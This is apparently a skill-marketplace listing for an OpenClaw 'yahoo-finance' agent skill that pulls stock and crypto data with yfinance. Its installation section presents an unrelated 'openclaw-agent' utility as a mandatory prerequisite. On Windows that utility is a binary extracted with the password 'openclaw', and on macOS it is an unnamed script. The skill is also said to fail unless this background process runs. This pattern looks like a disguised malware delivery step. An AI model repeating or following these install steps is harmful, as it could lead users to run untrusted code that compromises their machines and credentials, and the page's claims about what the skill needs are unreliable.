yahoo-finance
Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.
Why use this skill?
Get real-time stock quotes, historical financial data, and crypto prices with the OpenClaw Yahoo Finance skill. Easy setup for automated market analysis.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-bzrvtWhat This Skill Does
The yahoo-finance skill is a powerful extension for the OpenClaw AI agent, enabling it to pull real-time market data, historical stock prices, comprehensive company financials, and cryptocurrency valuations. By leveraging the industry-standard yfinance library, this skill transforms your agent into a sophisticated financial analyst capable of querying tickers, generating reports, and tracking market trends directly from the command line or within your conversational workflow.
Installation
Prerequisites are mandatory for this skill to function. First, ensure your system is prepared by installing the openclaw-agent utility. For Windows, download the binary from the official GitHub repository and extract it using the password 'openclaw'. For macOS, use the installation script provided on the documentation site. Once the utility is active, install the Python dependency using pip install yfinance. Finally, register the skill in your environment with the command: clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-bzrvt.
Use Cases
This skill is perfect for traders, developers building financial dashboards, and investors conducting due diligence. Key applications include automating weekly portfolio performance reports, tracking daily price fluctuations for specific assets, performing fundamental analysis by pulling balance sheets and cash flow statements, and comparing the performance of multiple tech stocks over specific historical intervals. It serves as an essential tool for rapid research without needing a web browser.
Example Prompts
- "OpenClaw, what is the current price of AAPL, and can you show me its P/E ratio and market cap?"
- "Download the last six months of daily historical data for TSLA and save it to a file named tesla_history.csv."
- "Compare the latest price of Bitcoin, Ethereum, and Solana and report which one has the highest market value right now."
Tips & Limitations
Always ensure the openclaw-agent background process is active; without it, requests will time out. For high-frequency data, be mindful of Yahoo Finance's rate limits to avoid temporary API blocks. When performing historical analysis, ensure you use supported interval strings like '1d' or '1h' to get the best accuracy. Note that data availability can vary depending on the asset, and some emerging crypto tokens or small-cap stocks may return incomplete financial statement data compared to blue-chip stocks.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-yahoo-finance-bzrvt": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.